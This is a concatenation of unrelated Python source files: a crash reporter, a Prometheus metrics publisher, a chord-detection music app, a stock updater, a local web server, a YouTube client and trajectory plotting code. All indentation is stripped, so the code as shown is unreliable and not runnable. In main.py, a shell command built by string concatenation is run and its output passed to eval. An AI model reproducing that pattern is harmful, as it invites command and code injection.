hq_success = smtp_success = False
if self._hq is not None:
hq_success = self.hq_submit(self.payload)
if hq_success:
self.payload['HQ Submission'] = 'Sent'
if self._smtp is not None:
# Send the report via email
smtp_success = self.smtp_submit(self.subject(), self.body(self.payload), self.attachments())
if smtp_success:
self.payload['SMTP Submission'] = 'Sent'
if not CrashReporter.active or (self._smtp and not smtp_success) or (self._hq and not hq_success):
# Only store the offline report if any of the upload methods fail, or if the Crash Reporter was disabled
report_path = self.store_report(self.payload)
self.logger.info('Offline Report stored %s' % report_path)
def generate_payload(self, err_name, err_msg, analyzed_tb):
dt = datetime.datetime.now()
payload = {'Error Type': err_name,
'Error Message': err_msg + self._recursion_error * " (Not all tracebacks are shown)",
'Application Name': self.application_name,
'Application Version': self.application_version,
'User': self.user_identifier,
'Date': dt.strftime('%d %B %Y'),
'Time': dt.strftime('%I:%M %p'),
'Traceback': analyzed_tb,
'HQ Submission': 'Not sent' if self._hq else 'Disabled',
'SMTP Submission': 'Not sent' if self._smtp else 'Disabled'
}
return payload
def load_configuration(self, config):
cfg = ConfigParser.ConfigParser()
with open(config, 'r') as _f:
cfg.readfp(_f)
if cfg.has_section('General'):
general = dict(cfg.items('General'))
self.application_name = general.get('application_name', CrashReporter.application_name)
self.application_version = general.get('application_version', CrashReporter.application_version)
self.user_identifier = general.get('user_identifier', CrashReporter.user_identifier)
self.offline_report_limit = general.get('offline_report_limit', CrashReporter.offline_report_limit)
self.max_string_length = general.get('max_string_length', CrashReporter.max_string_length)
if cfg.has_section('SMTP'):
self.setup_smtp(**dict(cfg.items('SMTP')))
if 'port' in self._smtp:
self._smtp['port'] = int(self._smtp['port'])
if 'recipients' in self._smtp:
self._smtp['recipients'] = self._smtp['recipients'].split(',')
if cfg.has_section('HQ'):
self.setup_hq(**dict(cfg.items('HQ')))
def subject(self):
"""
Return a string to be used as the email subject line.
"""
if self.application_name and self.application_version:
return 'Crash Report - {name} (v{version})'.format(name=self.application_name,
version=self.application_version)
else:
return 'Crash Report'
def body(self, payload):
return self.render_report(payload, inspection_level=self.inspection_level)
def render_report(self, payload, inspection_level=1):
with open(self.html_template, 'r') as _f:
template = jinja2.Template(_f.read())
return template.render(info=payload,
inspection_level=inspection_level)
def attachments(self):
"""
Generate and return a list of attachments to send with the report.
:return: List of strings containing the paths to the files.
"""
return []
def delete_offline_reports(self):
"""
Delete all stored offline reports
:return: List of reports that still require submission
"""
reports = self.get_offline_reports()
remaining_reports = reports[:]
for report in reports:
with open(report, 'r') as _f:
try:
js = json.load(_f)
except ValueError as e:
logging.error("%s. Deleting crash report.")
os.remove(report)
continue
if js['SMTP Submission'] in ('Sent', 'Disabled') and js['HQ Submission'] in ('Sent', 'Disabled'):
# Only delete the reports which have been sent or who's upload method is disabled.
remaining_reports.remove(report)
try:
os.remove(report)
except OSError as e:
logging.error(e)
self.logger.info('CrashReporter: Deleting offline reports. %d reports remaining.' % len(remaining_reports))
return remaining_reports
def submit_offline_reports(self):
"""
Submit offline reports using the enabled methods (SMTP and/or HQ)
Returns a tuple of (N sent reports, N remaining reports)
"""
smtp_enabled = bool(self._smtp)
hq_enabled = bool(self._hq)
offline_reports = self.get_offline_reports()
logging.info('Submitting %d offline crash reports' % len(offline_reports))
offline_reports = offline_reports[:self.send_at_most]
if smtp_enabled:
try:
smtp_success = self._smtp_send_offline_reports(*offline_reports)
except Exception as e:
logging.error(e)
smtp_success = [False] * len(offline_reports)
else:
smtp_success = [True] * len(offline_reports)
if hq_enabled:
try:
hq_success = self._hq_send_offline_reports(*offline_reports)
except Exception as e:
logging.error(e)
hq_success = [False] * len(offline_reports)
else:
hq_success = [True] * len(offline_reports)
remaining_reports = self.delete_offline_reports()
success = [s1 and s2 for (s1, s2) in zip(smtp_success, hq_success)]
logging.info('%d crash reports successfully submitted' % success.count(True))
logging.info('%d crash reports remain to be submitted' % len(remaining_reports))
return all(success)
def store_report(self, payload):
"""
Save the crash report to a file. Keeping the last `offline_report_limit` files in a cyclical FIFO buffer.
The newest crash report always named is 01
"""
offline_reports = self.get_offline_reports()
if offline_reports:
# Increment the name of all existing reports 1 --> 2, 2 --> 3 etc.
for ii, report in enumerate(reversed(offline_reports)):
rpath, ext = os.path.splitext(report)
n = int(re.findall('(\d+)', rpath)[-1])
new_name = os.path.join(self.report_dir, self._report_name % (n + 1)) + ext
shutil.copy2(report, new_name)
os.remove(report)
# Delete the oldest report
if len(offline_reports) >= self.offline_report_limit:
oldest = glob.glob(os.path.join(self.report_dir, self._report_name % (self.offline_report_limit+1) + '*'))[0]
os.remove(oldest)
new_report_path = os.path.join(self.report_dir, self._report_name % 1 + '.json')
# Write a new report
with open(new_report_path, 'w') as _f:
json.dump(payload, _f)
return new_report_path
def hq_submit(self, payload):
payload['HQ Parameters'] = self._hq if self._hq is not None else {}
r = upload_report(self._hq['server'], payload, timeout=self._hq['timeout'])
if r is False:
return False
else:
return r.status_code == 200
def smtp_submit(self, subject, body, attachments=None):
smtp = self._smtp
msg = MIMEMultipart()
if isinstance(smtp['recipients'], list) or isinstance(smtp['recipients'], tuple):
msg['To'] = ', '.join(smtp['recipients'])
else:
msg['To'] = smtp['recipients']
msg['From'] = smtp['from']
msg['Subject'] = subject
# Add the body of the message
msg.attach(MIMEText(body, 'html'))
# Add any attachments
if attachments:
for attachment in attachments:
part = MIMEBase('application', 'octet-stream')
part.set_payload(open(attachments, 'rb').read())
encoders.encode_base64(part)
part.add_header('Content-Disposition',
'attachment; filename="%s"' % os.path.basename(attachment))
msg.attach(part)
try:
ms = smtplib.SMTP(smtp['host'], smtp['port'], timeout=smtp['timeout'])
ms.ehlo()
ms.starttls()
ms.ehlo()
ms.login(smtp['user'], smtp['passwd'])
ms.sendmail(smtp['from'], smtp['recipients'], msg.as_string())
ms.close()
except Exception as e:
self.logger.error('CrashReporter: %s' % e)
return False
return True
def get_offline_reports(self):
return sorted(glob.glob(os.path.join(self.report_dir, self._report_name.replace("%d", "*"))))
def poll(self):
for remote, local in CrashReportingProcess.cr_pipes:
if remote.poll():
pkg = remote.recv()
self.logger.debug('Interprocess payload found.')
self.handle_payload(self.generate_payload(*pkg))
return True
return False
def _watcher_thread(self):
"""
Periodically attempt to upload the crash reports. If any upload method is successful, delete the saved reports.
"""
while 1:
time.sleep(self.check_interval)
if not self._watcher_running:
break
self.logger.info('CrashReporter: Attempting to send offline reports.')
self.submit_offline_reports()
remaining_reports = len(self.get_offline_reports())
if remaining_reports == 0:
break
self._watcher = None
self.logger.info('CrashReporter: Watcher stopped.')
def _smtp_send_offline_reports(self, *offline_reports):
success = []
if offline_reports:
# Add the body of the message
for report in offline_reports:
with open(report, 'r') as js:
payload = json.load(js)
if payload['SMTP Submission'] == 'Not sent':
success.append(self.smtp_submit(self.subject(), self.body(payload)))
if success[-1]:
# Set the flag in the payload signifying that the SMTP submission was successful
payload['SMTP Submission'] = 'Sent'
with open(report, 'w') as js:
json.dump(payload, js)
self.logger.info('CrashReporter: %d Offline reports sent.' % sum(success))
return success
def _hq_send_offline_reports(self, *offline_reports):
payloads = {}
if offline_reports:
for report in offline_reports:
with open(report, 'r') as _f:
payload = json.load(_f)
if payload['HQ Submission'] == 'Not sent':
payload['HQ Parameters'] = self._hq if self._hq is not None else {}
payloads[report] = payload
if payloads:
r = upload_many_reports(self._hq['server'], payloads.values(), timeout=self._hq['timeout'])
if r is False or r.status_code != 200:
return [False] * len(payloads)
# Set the flag in the payload signifying that the HQ submission was successful
for report, payload in payloads.iteritems():
payload['HQ Submission'] = 'Sent'
with open(report, 'w') as js:
json.dump(payload, js)
return [True] * len(payloads)
else:
return [False] * len(payloads)
|
publisher_server.py
|
import json
import sys
import traceback
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
from SocketServer import ThreadingMixIn
import threading
from Queue import Queue
from oslo_config import cfg
from ceilometer import service
from ceilometer_fiprom.fiprom_storage import PrometheusStorage
from ceilometer.openstack.common import log
LOG = log.getLogger(__name__)
OPTS = [
cfg.IntOpt('server_port',
help='port where the fiprom server will be listning')
]
cfg.CONF.register_opts(OPTS, group="fiprom")
# thread safe queue to keep requests to process
q = Queue(maxsize=0)
def process_request():
publisher = PrometheusStorage("")
while True:
data = q.get()
try:
LOG.debug('Processing request (%s left in the queue)', q.qsize())
publisher.record_metering_data(data)
except:
traceback.print_exc(file=sys.stdout)
q.task_done()
class Handler(BaseHTTPRequestHandler):
def _set_headers(self):
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
def do_POST(self):
data = self.rfile.read(int(self.headers['Content-Length']))
self._set_headers()
jdata = json.loads(data)
q.put(jdata)
LOG.debug('Adding request (%s already in the queue) [n.threads=%s]', q.qsize(), threading.activeCount())
class ThreadedHTTPServer(ThreadingMixIn, HTTPServer):
"""Handle requests in a separate thread."""
if __name__ == '__main__':
# load configuration
service.prepare_service()
# set-up a thread for reading from the queue
worker = threading.Thread(target=process_request)
worker.setDaemon(True)
worker.start()
# set-up the htt server
port = cfg.CONF.fiprom.server_port
server = ThreadedHTTPServer(('0.0.0.0', port), Handler)
server.serve_forever()
|
main.py
|
# Joey Alexander
# Built by Gautam Mittal (2017)
# Real-time chord detection and improvisation software that uses Fast Fourier Transforms, DSP, and machine learning
import sys
sys.path.append('util')
from PyQt4 import QtGui, QtCore
from matplotlib.backends.backend_qt4agg import FigureCanvasQTAgg as FigureCanvas
from matplotlib.backends.backend_qt4agg import NavigationToolbar2QT as NavigationToolbar
from music21 import *
import os, threading, subprocess, numpy as np, atexit, pyaudio, matplotlib.pyplot as plt, chords, peakutils, player
# Set up chord detection variables
global CURRENT_CHORD, CURRENT_SCALE, detection_started
chordFinder = chords.ChordDetector()
chordQualities = chords.qualities
chordRoots = chords.noteNames
# Set up synthesized instrument
instrument = player.Player()
instrument.setBPM(240)
def run():
global CURRENT_SCALE
while True:
instrument.play(CURRENT_SCALE["scale"])
# Given chord symbol return list of 1, 3, 5, 7 scale degrees ("chord tones")
def chordTones(chordSymbol):
return eval(os.popen('./util/chordScale "'+chordSymbol+'"').read())
# Given a chord, find an appropriate scale to use for improvisation
def improvisationScale(chord, symbol):
# Decide on scale type based on common chord-scale conventions
scaleType = scale.DorianScale()
if chord.quality == 1:
scaleType = scale.MajorScale()
elif chord.quality == 3:
scaleType = scale.MixolydianScale()
tones = map(lambda x: x.replace('b', '-'), chordTones(symbol))
scales = scaleType.derive(tones) # Find the scale based on the given tones
allPitches = scales.getPitches() # Get the assosciated scale degrees
allNoteNames = [i.name for i in allPitches] # Turn them into real note names
return {'name': scales.name, 'scale': allNoteNames}
# Record audio in real-time for chord detection
class MicrophoneRecorder(object):
def __init__(self, rate=2000, chunksize=2**12):
self.rate = rate
self.chunksize = chunksize
self.p = pyaudio.PyAudio()
self.stream = self.p.open(format=pyaudio.paInt16,
channels=1,
rate=self.rate,
input=True,
frames_per_buffer=self.chunksize,
stream_callback=self.new_frame)
self.lock = threading.Lock()
self.stop = False
self.frames = []
atexit.register(self.close)
def new_frame(self, data, frame_count, time_info, status):
data = np.fromstring(data, 'int16')
with self.lock:
self.frames.append(data)
if self.stop:
return None, pyaudio.paComplete
return None, pyaudio.paContinue
def get_frames(self):
with self.lock:
frames = self.frames
self.frames = []
return frames
def start(self):
self.stream.start_stream()
def close(self):
with self.lock:
self.stop = True
self.stream.close()
self.p.terminate()
class MplFigure(object):
def __init__(self, parent):
self.figure = plt.figure(facecolor='white')
self.canvas = FigureCanvas(self.figure)
class LiveFFTWidget(QtGui.QWidget):
def __init__(self):
QtGui.QWidget.__init__(self)
self.initUI()
self.initData()
self.initMplWidget()
def initUI(self):
vbox = QtGui.QVBoxLayout()
self.main_figure = MplFigure(self)
vbox.addWidget(self.main_figure.canvas)
self.setLayout(vbox)
self.setGeometry(300, 300, 350, 300)
self.setWindowTitle('Joey Alexander')
self.show()
timer = QtCore.QTimer()
timer.timeout.connect(self.handleNewData)
timer.start(50)
self.timer = timer
def initData(self):
mic = MicrophoneRecorder()
mic.start()
self.mic = mic
self.freq_vect = np.fft.rfftfreq(mic.chunksize,
1./mic.rate)
self.time_vect = np.arange(mic.chunksize, dtype=np.float32) / mic.rate * 1000
def initMplWidget(self):
self.ax_top = self.main_figure.figure.add_subplot(211)
self.ax_top.set_ylim(-32768, 32768)
self.ax_top.set_xlim(0, self.time_vect.max())
self.ax_top.set_xlabel(u'time (ms)', fontsize=6)
self.ax_bottom = self.main_figure.figure.add_subplot(212)
self.ax_bottom.set_ylim(0, 1)
self.ax_bottom.set_xlim(0, self.freq_vect.max())
self.ax_bottom.set_xlabel(u'frequency (Hz)', fontsize=6)
self.line_top, = self.ax_top.plot(self.time_vect,
np.ones_like(self.time_vect))
self.line_bottom, = self.ax_bottom.plot(self.freq_vect,
np.ones_like(self.freq_vect))
# handles the asynchroneously collected sound chunks
def handleNewData(self):
global detection_started, CURRENT_SCALE, CURRENT_CHORD
frames = self.mic.get_frames()
if len(frames) > 0:
current_frame = frames[-1]
# get 12x1 chroma vector with respective energies for each note
chroma = chords.calculateChromagram(self.freq_vect, np.abs(np.fft.rfft(current_frame)))
chordFinder.detectChord(chroma)
chordString = ""
if chordFinder.intervals > 0:
chordString = str(chordRoots[chordFinder.rootNote]) + str(chordQualities[chordFinder.quality]) + str(chordFinder.intervals)
else:
chordString = str(chordRoots[chordFinder.rootNote]) + str(chordQualities[chordFinder.quality])
CURRENT_SCALE = improvisationScale(chordFinder, chordString)
CURRENT_CHORD = {
'chord': chordString,
'root': chordRoots[chordFinder.rootNote],
'quality': chordQualities[chordFinder.quality],
'interval': chordFinder.intervals
}
print CURRENT_CHORD
if detection_started == False:
detection_started = True
t = threading.Thread(target=run).start()
# plots the time signal
self.line_top.set_data(self.time_vect, current_frame)
fft_frame = np.fft.rfft(current_frame)
fft_frame /= np.abs(fft_frame).max()
self.line_bottom.set_data(self.freq_vect, np.abs(fft_frame))
self.main_figure.canvas.draw()
if __name__ == "__main__":
detection_started = False
app = QtGui.QApplication(sys.argv)
window = LiveFFTWidget()
sys.exit(app.exec_())
|
update_stock_trade.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import multiprocessing
import os
import sys
import time
import traceback
from webapp.models.req_error_log import ReqErrorLog
sys.path.insert(0, os.path.dirname(os.path.dirname(__file__)))
from webapp import app, db, config_app
from webapp.services import db_service as dbs,data_service as dts
reload(sys)
sys.setdefaultencoding('utf8')
import threading
config_app(app, 'scriptfan.cfg')
ctx = app.app_context()
g_queue = multiprocessing.Queue()
def update_stock(t):
ctx.push()
while not g_queue.empty():
time.sleep(5)
item = g_queue.get()
try:
dts.updateTradeData(item)
except Exception, ex:
app.logger.warn('stock %s update fail' % item)
msg = traceback.format_exc()
eLog = ReqErrorLog("trade_update", item, msg[:1800])
db.session.add(eLog)
db.session.commit()
continue
def main():
ctx.push()
# datas = ['000002']
datas = dbs.get_refresh_trade_stocks()
for code in datas:
g_queue.put(code)
thread_list = [threading.Thread(target=update_stock, args=(i,)) for i in range(5)]
for t in thread_list:
t.start()
for t in thread_list:
if t.is_alive():
t.join()
if __name__ == '__main__':
main()
|
website.py
|
from threading import Thread
import webbrowser, http.server, socketserver
import time
# 网站绑定端口号
port_number = 8080
server = None
def startServer(port):
Handler = http.server.SimpleHTTPRequestHandler
global server
server = socketserver.TCPServer(("", port), Handler)
print("Start server at port", port)
server.serve_forever()
def start(port):
thread = Thread(target=startServer, args=[port])
thread.start()
startTime = int(time.time())
while not server:
if int(time.time()) > startTime + 60:
print("Time out")
break
return server
def stop():
if server:
server.shutdown()
def openUrl():
url = "http://localhost:" + str(port_number)
webbrowser.open(url)
print(url + " is opened in browser")
if __name__ == "__main__":
start(port_number)
openUrl()
|
youtube_client.py
|
#!/usr/bin/env python3
import argparse
from tkinter import Tk
from tkinter import X as FILLX
from tkinter import BOTH as FILLBOTH
from tkinter.ttk import Treeview, Progressbar, Style, Frame, Label, Button
import threading
import requests
from bs4 import BeautifulSoup, SoupStrainer
import json
import datetime
import time
from collections import namedtuple
import sys
import os
from os.path import expanduser
from os.path import join as pjoin
TODAY = datetime.date.today().strftime("%m/%d/%y")
def clean_unicode(data):
"""
since tkinter can't display unicode over 0xFFFF, they are removed
before being displayed on tkinter
"""
return "".join([a if ord(a) < 0xFFFF else "*" for a in data ])
def get_videos(url):
"""
returns a list of videos from a given channel.
The list has the format of [(url, title), (url, title), ... , (url, title)]
"""
try:
strain = SoupStrainer("h3")
doc = BeautifulSoup(requests.get(url).text, "html.parser", parse_only=strain)
video_entries = doc.find_all("h3", attrs={"class" : "yt-lockup-title"})
return [(a.find("a").get("href"), a.find("a").text) for a in video_entries]
except Exception as e:
print("Problem with:", url, e)
return []
def get_today_videos():
history_file = expanduser(pjoin("~", ".config","ytsub","history.txt"))
TODAY = datetime.date.today().strftime("%m/%d/%y")
with open(history_file) as f:
for a in f:
date = a.strip().split()[1]
if date == TODAY:
yield " ".join(a.strip().split()[2:])
class YoutubeClient(Frame):
def __init__(self, dark_theme=False, master=None):
super().__init__(master)
self.pack(fill=FILLBOTH, expand=1)
if dark_theme:
Style().configure(".", background="#111111", foreground="white")
Style().configure("Treeview", background="#222222", fieldbackground="#222222", foreground="orange")
Style().map("Treeview.Heading", background=[('active', '#111111')], foreground=[('active','orange')])
Style().configure("Treeview.Heading", font=("TkDefaultFont", 18))
Style().map("TButton",
background=[('pressed', '#555555')],
foreground=[('active', "orange")])
Style().configure("TButton", font=("TkDefaultFont", 18))
Style().configure("TLabel", font=("TkDefaultFont", 18))
# results tree
self.results = Treeview(self)
self.results["columns"] = ("video")
self.results.column("#0", width=175, stretch=False)
self.results.heading("#0", text="channel")
self.results.column("video")
self.results.heading("video", text="video")
self.results.bind("<Double-Button-1>", self.clipboard)
self.results.pack(side="top", fill=FILLBOTH, expand=1)
# I/O row
self.button_bar = Frame(self)
self.button_bar.pack(side="top", fill=FILLX)
self.progressLabel = Label(self.button_bar, text="progress")
self.progressLabel.pack(side="left")
self.progress = Progressbar(self.button_bar, orient="horizontal", length=200, mode="determinate")
self.progress.pack(side="left")
self.update = Button(self.button_bar, text="Update", command=self.update_vids)
self.update.pack(side="right")
self.show_today = Button(self.button_bar, text="show todays vids", command=self.show_todays_vids)
self.show_today.pack(side="right")
#########################
## callback functions ##
#########################
def update_vids(self):
self.clear_results()
t = threading.Thread(target=self.get_recent_videos)
t.daemon = True
t.start()
def show_todays_vids(self):
self.clear_results()
for a in get_today_videos():
channel = a.split()[0]
title = " ".join(a.split()[1:])
self.add_video(channel, title)
def clipboard(self, event):
index = self.results.focus()
if index and "values" in self.results.item(index) and len(self.results.item(index)["values"]):
video_title = self.results.item(index)["values"][0]
self.clipboard_clear()
self.clipboard_append(video_title)
##########################
### utility functions ###
##########################
def clear_results(self):
if self.results.get_children():
for a in self.results.get_children():
self.results.delete(a)
def add_video(self, channel, video_title):
# since tkinter can't display unicode over 0xFFFF, they are removed
# before being displayed on tkinter
channel = clean_unicode(channel)
video_title = clean_unicode(video_title)
channel_tree = [b for b in self.results.get_children() if b == channel]
if channel_tree:
video_leaf = self.results.insert(channel_tree[0], 0, values=(video_title,))
self.results.see(video_leaf)
else:
channel_tree_branch = self.results.insert("", 0, channel, text=channel)
video_leaf = self.results.insert(channel_tree_branch, 0, values=(video_title,))
self.results.see(video_leaf)
def clear_box(self):
for i in range(self.results.size()):
self.results.delete(0)
def get_recent_videos(self):
history_file = expanduser(pjoin("~", ".config","ytsub","history.txt"))
url_file = expanduser(pjoin("~", ".config", "ytsub", "channels.txt"))
TODAY = datetime.date.today().strftime("%m/%d/%y")
with open(history_file) as f:
old_videos = [a.split()[0].strip() for a in f]
with open(url_file) as f:
channels = [a.split() for a in f]
self.progress["maximum"] = len(channels)
for i, channel in enumerate(channels):
channel_url, channel_title = channel
self.progressLabel["text"] = "{0} / {1}".format(i + 1, len(channels))
time.sleep(3)
for video in get_videos(channel_url):
video_link, video_title = video
if video_link not in old_videos:
self.add_video(channel_title, video_title)
with open(history_file, "a") as f:
struct = [video_link, TODAY, channel_title, video_title]
f.write(" ".join(struct) + "\n")
# after values are added, increment the progress bar.
self.progress["value"] = i + 1
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("-g", "--gui", action="store_true", help="run gui")
parser.add_argument("-d", "--dark", action="store_true", help="Dark theme?")
args = parser.parse_args()
if args.gui:
root = Tk()
root.geometry('800x500+0+0')
root.wm_title("ytgui")
app = YoutubeClient(dark_theme=args.dark, master=root)
app.mainloop()
else:
history_file = expanduser(pjoin("~", ".config","ytsub","history.txt"))
url_file = expanduser(pjoin("~", ".config", "ytsub", "channels.txt"))
TODAY = datetime.date.today().strftime("%m/%d/%y")
with open(history_file) as f:
old_videos = [a.split()[0].strip() for a in f]
with open(url_file) as f:
channels = [a.split() for a in f]
for i, channel in enumerate(channels):
channel_url, channel_title = channel
time.sleep(3)
for video in get_videos(channel_url):
video_link, video_title = video
if video_link not in old_videos:
with open(history_file, "a") as f:
struct = [video_link, TODAY, channel_title, video_title]
f.write(" ".join(struct) + "\n")
|
plot.py
|
import numpy as np
import os
import pinocchio as pin
from mlp.utils.util import discretizeCurve, discretizeSE3CurveTranslation, discretizeDerivateCurve
import matplotlib
matplotlib.use("Qt4agg")
import matplotlib.pyplot as plt
from multiprocessing import Process
from mlp.utils.requirements import Requirements
pin.switchToNumpyArray()
plt.ioff()
def show(plt):
plt.show()
def show_non_blocking(plt):
p = Process(target=show, args=([plt]))
p.start()
def addVerticalLineContactSwitch(cs, plt, linestyle="-.", color='k'):
for phase in cs.contactPhases:
plt.axvline(phase.timeFinal, linestyle=linestyle, color=color)
def plotEffectorTrajectoryWithReference(cs_ref, cs, dt):
labels = [
"x (m)", "y (m)", "z (m)", "dx (m/s)", "dy (m/s)", "dz (m/s)", "ddx (m/s^2)", "ddy (m/s^2)", "ddz (m/s^2)"
]
colors = ['r', 'g', 'b']
for eeName in cs.getAllEffectorsInContact():
traj = cs.concatenateEffectorTrajectories(eeName)
if traj.num_curves() > 0:
pos, timeline = discretizeSE3CurveTranslation(traj, dt)
vel = discretizeDerivateCurve(traj, dt, 1)[0][:3, :]
acc = discretizeDerivateCurve(traj, dt, 2)[0][:3, :]
values = np.vstack([pos, vel, acc])
traj_ref = cs_ref.concatenateEffectorTrajectories(eeName)
pos_ref = discretizeSE3CurveTranslation(traj_ref, dt)[0]
vel_ref = discretizeDerivateCurve(traj_ref, dt, 1)[0][:3, :]
acc_ref = discretizeDerivateCurve(traj_ref, dt, 2)[0][:3, :]
values_ref = np.vstack([pos_ref, vel_ref, acc_ref])
fig, ax = plt.subplots(3, 3)
fig.canvas.set_window_title("Trajectory for effector " + eeName + " (dashed = reference)")
fig.suptitle("Trajectory for effector " + eeName + " (dashed = reference)", fontsize=20)
for i in range(3): # line = pos,vel,acc
for j in range(3): # col = x,y,z
ax_sub = ax[i, j]
ax_sub.plot(timeline.T, values[i * 3 + j, :].T, color=colors[j])
ax_sub.plot(timeline.T, values_ref[i * 3 + j, :].T, color=colors[j], linestyle="dashed")
ax_sub.set_xlabel('time (s)')
ax_sub.set_ylabel(labels[i * 3 + j])
addVerticalLineContactSwitch(cs, ax_sub)
ax_sub.grid(False)
plt.show(block=False)
def plotEffectorTrajectory(cs, dt, name_prefix = ""):
labels = [
"x (m)", "y (m)", "z (m)", "dx (m/s)", "dy (m/s)", "dz (m/s)", "ddx (m/s^2)", "ddy (m/s^2)", "ddz (m/s^2)"
]
colors = ['r', 'g', 'b']
for eeName in cs.getAllEffectorsInContact():
traj = cs.concatenateEffectorTrajectories(eeName)
pos, timeline = discretizeSE3CurveTranslation(traj, dt)
vel = discretizeDerivateCurve(traj, dt, 1)[0][:3, :]
acc = discretizeDerivateCurve(traj, dt, 2)[0][:3, :]
values = np.vstack([pos, vel, acc])
fig, ax = plt.subplots(3, 3)
fig.canvas.set_window_title(name_prefix+" trajectory for effector " + eeName)
fig.suptitle(name_prefix+" trajectory for effector " + eeName, fontsize=20)
for i in range(3): # line = pos,vel,acc
for j in range(3): # col = x,y,z
ax_sub = ax[i, j]
ax_sub.plot(timeline.T, values[i * 3 + j, :].T, color=colors[j])
ax_sub.set_xlabel('time (s)')
ax_sub.set_ylabel(labels[i * 3 + j])
addVerticalLineContactSwitch(cs, ax_sub)
ax_sub.grid(False)
plt.show(block=False)
def plotEffectorError(cs_ref, cs, dt):
labels = ["x (m)", "y (m)", "z (m)"]
colors = ['r', 'g', 'b']
for eeName in cs.getAllEffectorsInContact():
traj = cs.concatenateEffectorTrajectories(eeName)
traj_ref = cs_ref.concatenateEffectorTrajectories(eeName)
assert traj.min() == traj_ref.min(), "In plotEffectorError : reference and real one do not have the same timeline"
assert traj.max() == traj_ref.max(), "In plotEffectorError : reference and real one do not have the same timeline"
pos_ref, timeline = discretizeSE3CurveTranslation(traj_ref, dt)
pos = discretizeSE3CurveTranslation(traj, dt)[0]
error = pos - pos_ref
fig, ax = plt.subplots(3, 1)
fig.canvas.set_window_title("Effector tracking error : " + eeName)
fig.suptitle("Effector tracking error : " + eeName, fontsize=20)
for i in range(3): # line = x,y,z
ax_sub = ax[i]
ax_sub.plot(timeline.T, error[i, :].T, color=colors[i])
ax_sub.set_xlabel('time (s)')
ax_sub.set_ylabel(labels[i])
ax_sub.yaxis.grid(False)
addVerticalLineContactSwitch(cs, ax_sub)
def plotCOMdifference(cs_ref, cs, dt, name):
labels = ["x (m)", "y (m)", "z (m)"]
colors = ['r', 'g', 'b']
fig, ax = plt.subplots(3, 1)
fig.canvas.set_window_title(name)
fig.suptitle(name, fontsize=20)
traj = cs.concatenateCtrajectories()
traj_ref = cs_ref.concatenateCtrajectories()
pos, timeline = discretizeCurve(traj, dt)
pos_ref = discretizeCurve(traj_ref, dt)[0]
error = pos - pos_ref
for i in range(3): # line = x,y,z
ax_sub = ax[i]
ax_sub.plot(timeline.T, error[i, :].T, color=colors[i])
ax_sub.set_xlabel('time (s)')
ax_sub.set_ylabel(labels[i])
ax_sub.yaxis.grid()
addVerticalLineContactSwitch(cs, ax_sub)
def plotAMdifference(cs_ref, cs, dt, name):
labels = ["x", "y", "z"]
colors = ['r', 'g', 'b']
fig, ax = plt.subplots(3, 1)
fig.canvas.set_window_title(name)
fig.suptitle(name, fontsize=20)
traj = cs.concatenateLtrajectories()
traj_ref = cs_ref.concatenateLtrajectories()
pos, timeline = discretizeCurve(traj, dt)
pos_ref = discretizeCurve(traj_ref, dt)[0]
error = pos - pos_ref
for i in range(3): # line = x,y,z
ax_sub = ax[i]
ax_sub.plot(timeline.T, error[i, :].T, color=colors[i])
ax_sub.set_xlabel('time (s)')
ax_sub.set_ylabel(labels[i])
ax_sub.yaxis.grid()
addVerticalLineContactSwitch(cs, ax_sub)
def plotZMP(cs_ref_iters, cs_iters, dt, circle_radius = 0.):
fig = plt.figure("ZMP(xy)")
ax = fig.gca()
plt.suptitle("ZMP(xy); dashed = ZMP reference ; lines = ZMP from wholebody ; green = feet placements")
ZMPs_t = []
ZMPs_ref = []
for cs in cs_iters:
ZMPs_t += [discretizeCurve(cs.concatenateZMPtrajectories(), dt)[0]]
for cs_ref in cs_ref_iters:
ZMPs_ref += [discretizeCurve(cs_ref.concatenateZMPtrajectories(), dt)[0]]
colors = ['b', 'g','r', 'c', 'm', 'y']
for k, ZMP_t in enumerate(ZMPs_t):
plt.plot(ZMP_t[0, :].T, ZMP_t[1, :].T, color=colors[k], label="iter "+str(k))
for k, ZMP_ref in enumerate(ZMPs_ref):
plt.plot(ZMP_ref[0, :].T, ZMP_ref[1, :].T, color=colors[k], linestyle='dashed')
plt.xlabel("x position (m)")
plt.ylabel("y position (m)")
plt.axis('equal')
plt.grid(False)
colors_circles = ['g', 'r', 'b', 'y']
effector_list = cs.getAllEffectorsInContact()
for p in cs.contactPhases:
# plot x for the center of the feets contact,
# and a circle of 1cm of radius around it (size of the flexibility) :
for eeName in p.effectorsInContact():
pos = p.contactPatch(eeName).placement.translation
color = colors_circles[effector_list.index(eeName)]
plt.plot(pos[0], pos[1], marker="x", markersize=20, color=color)
circle_r = plt.Circle((pos[0], pos[1]), circle_radius, color='g', fill=False)
ax.add_artist(circle_r)
ax.legend()
def plotZMPdifferences(cs_ref_iters, cs_iters, dt):
fig, ax = plt.subplots(len(cs_ref_iters), 2)
fig.canvas.set_window_title("Difference between the ZMP trajectories")
plt.suptitle("Difference between the ZMP trajectories from the centroidal solver and the wholebody after iterations of the dynamic filter.")
labels = ["X", "Y"]
for i, cs in enumerate(cs_iters):
ref, timeline = discretizeCurve(cs_ref_iters[i].concatenateZMPtrajectories(), dt)
zmp = discretizeCurve(cs.concatenateZMPtrajectories(), dt)[0]
diff = zmp - ref
for j in range(2):
ax_sub = ax[i, j]
ax_sub.plot(timeline.T, diff[j,:])
ax_sub.set_xlabel('time (s)')
ax_sub.set_ylabel(labels[j]+" values for iter " + str(i))
def plotCOMTrajWithReferences(cs_ref, cs, dt):
labels = [
"x (m)", "y (m)", "z (m)", "dx (m/s)", "dy (m/s)", "dz (m/s)", "ddx (m/s^2)", "ddy (m/s^2)", "ddz (m/s^2)"
]
colors = ['r', 'g', 'b']
fig, ax = plt.subplots(3, 3)
fig.canvas.set_window_title("COM trajectory (dashed = reference)")
fig.suptitle("COM trajectory (dashed = reference)", fontsize=20)
c_t, timeline = discretizeCurve(cs.concatenateCtrajectories(), dt)
dc_t = discretizeCurve(cs.concatenateDCtrajectories(), dt)[0]
ddc_t = discretizeCurve(cs.concatenateDDCtrajectories(), dt)[0]
c_ref = discretizeCurve(cs_ref.concatenateCtrajectories(), dt)[0]
dc_ref = discretizeCurve(cs_ref.concatenateDCtrajectories(), dt)[0]
ddc_ref = discretizeCurve(cs_ref.concatenateDDCtrajectories(), dt)[0]
